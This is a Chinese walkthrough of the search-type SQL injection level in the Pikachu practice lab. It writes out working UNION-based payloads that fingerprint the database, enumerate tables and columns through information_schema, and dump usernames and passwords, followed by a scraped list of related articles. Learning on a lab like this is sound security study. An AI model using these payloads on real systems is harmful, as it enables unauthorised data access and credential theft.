Pikachu靶场-SQL注入-搜索型注入过关步骤
Pikachu靶场-SQL注入-搜索型注入过关步骤
首先要明白MySQL数据库模糊搜索的语句,like ‘常%’、like ‘%常’、like ‘%常%’ 这个几个,这里就不详说这个语句了
判断注入点
不知道怎么写的代码以下几种语句都可以试试
这关我用的搜索型注入语句:
v%’ and -1=-1 – bbq
网上查到的搜索型注入语句:
‘and 1=1 and ‘%’=’
%’ and 1=1–’
%’ and 1=1 and ‘%’=’
单引号闭合的时候报了一个错误,这说明大概是 %xx%、xx%吧
直接上过程动图吧,看不清点击图片放大查看:
判断有多少个字段数
这关有4个,直接上动图:
展示显错位
查询当前数据库
version()查看数据库版本 ,database()查看当前数据库
v%' union select version(),database(),33 -- bbq
查询出数据库中的所有表
如果表多页面展示不全,可以使用 LIMIT 一页页展示,也可以使用group_concat() 拼接函数将显示的字段名包起来展示
v%' union select table_name,22,33 from information_schema.tables where table_schema=database() -- bbq
查询指定的表中的列名
查询出表名下一步就是,查询字段也就是列名称
v%' union select column_name,22,33 from information_schema.columns where table_schema='pikachu' and table_name='users' -- bbq
查询数据
当经过以上步骤,已经知道了数据库名、表名、字段名,那么就可以查询我们需要的数据了
v%' union select username,password,33 from users -- bbq
Pikachu靶场-SQL注入-搜索型注入过关步骤相关推荐
- Pikachu靶场—sql注入通关
Pikachu靶场-SQL注入篇 前言 一.数字型注入 二.字符型注入 三.搜索型注入 四.XX型注入 五.insert注入 六.delete注入 七.http header注入 八.盲注:基于布尔盲 ...
- Pikachu靶场-SQL Inject
Pikachu靶场-SQL Inject SQL Inject 漏洞原理概述 SQL Inject攻击流程 如何判断是否存在注入 如何判断注入点类型及常见注入类型 数字型 字符型 搜索型 XX型 SQ ...
- pikachu靶场SQL,sqlmap解法
GET型输入 字符型注入(此处细说): 随便输入点什么 URL http://192.168.56.1/pikachu2/vul/sqli/sqli_str.php?name=2121&sub ...
- SQL注入:搜索型注入
like语法 "%"匹配任何字符, "like"的意思就是像, "$" 变量 SQL语句:select username,id from ...
- SQL注入-整型注入实例
发现存在SQL注入的站点有很多都是PHP,估计是PHP的占有率太大了,而且建站方便效率高,这就和ios和安卓一样,始终认为安卓安全性差,win和linux,mac一样,始终认为win的安全性差,毕竟占 ...
- pikachu靶场通关之sql注入系列
目录 一.前置知识 二.SQL注入 三. 注入的一般方法 1. 手动注入 (1)联合查询union注入: (2)基于报错信息注入: (3)盲注: 2. 使用sqlmap注入 (1) 前置知识 (2) ...
- SQL注入之MySQL注入学习笔记(二)
补充:MySQL注释方法 文章目录 MySQL注入 基本介绍 字符型 数字型 搜索型 Cookie注入 HTTP头注入 具体实例 数字型注入 一般类型 被单引号包裹起来的 双引号加小括号包裹 两个括号 ...
- pikachu靶场通关指南
靶场搭建 docker搭建 docker pull area39/pikachu docker run -itd -p 80:80 -p 3306:3306 --name "p1" ...
- Pikachu靶场全关攻略(超详细!)
一.靶场搭建 准备工具 phpstudy **pikachu靶场下载地址:**https://github.com/zhuifengshaonianhanlu/pikachu 搭建过程 将靶场文件夹放 ...
最新文章
- SAP MM VL34事务代码批量创建Inbound Delivery
- gnu linux mysql下载_linux下的navicat for mysql下载
- zookepper 安装
- 华为云服务器配置ipv6,华为云获“IPv6支持度优秀奖”,持续助推云网融合
- wireshark windows版数据过滤插件安装及使用
- 小米11系列顶配版曝光:骁龙888加持 代号“star”!
- java glassfish_java - Tomcat,JBoss和Glassfish有什么区别?
- [Swust OJ 188]--异面空间(读懂题意很重要)
- Hyperledger Fabric教程(1)--Hyperledger Fabric 老版本 1.1.0 快速部署安装
- 广义积分中值定理的证明(柯西中值定理)
- 笔记本计算机bios设置,笔记本怎么进入bios设置【方法步骤】
- c 语言万年历 节日查询,C语言 程序设计 节日查询和任务提醒系统万年历.doc
- SAP资产负债表实现方案探索 - 基于 VBA 自定义函数方法
- 基于Qt ffmpeg opengl开发跨平台安卓实时投屏软件
- 二维码制作软件那个好用?
- 地方政府不愿房价下跌 救市或化解房地产调控
- 基于单片机的电子琴系统设计(#0424)
- 获取android 默认的机器人图标,APP桌面只显示默认机器人图标的几个解决方法
- 老师,强奸你时别叫痛(转载)
- 云与海计算机谱,天谕手游云与海乐谱_云与海乐谱代码分享_3DM手游